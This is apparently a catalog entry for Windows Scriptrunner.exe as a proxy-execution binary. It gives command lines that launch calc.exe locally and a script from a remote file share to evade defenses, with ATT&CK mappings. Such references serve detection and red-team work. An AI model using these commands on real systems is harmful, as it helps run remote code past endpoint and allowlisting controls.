.. /Scriptrunner.exe
Star

Execute

Execute binary through proxy binary to evade defensive counter measures


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. Executes calc.exe

    Scriptrunner.exe -appvscript calc.exe
    Use case
    Execute binary through proxy binary to evade defensive counter measures
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1202
  2. Executes calc.cmd from remote server

    ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
    Use case
    Execute binary through proxy binary from external server to evade defensive counter measures
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218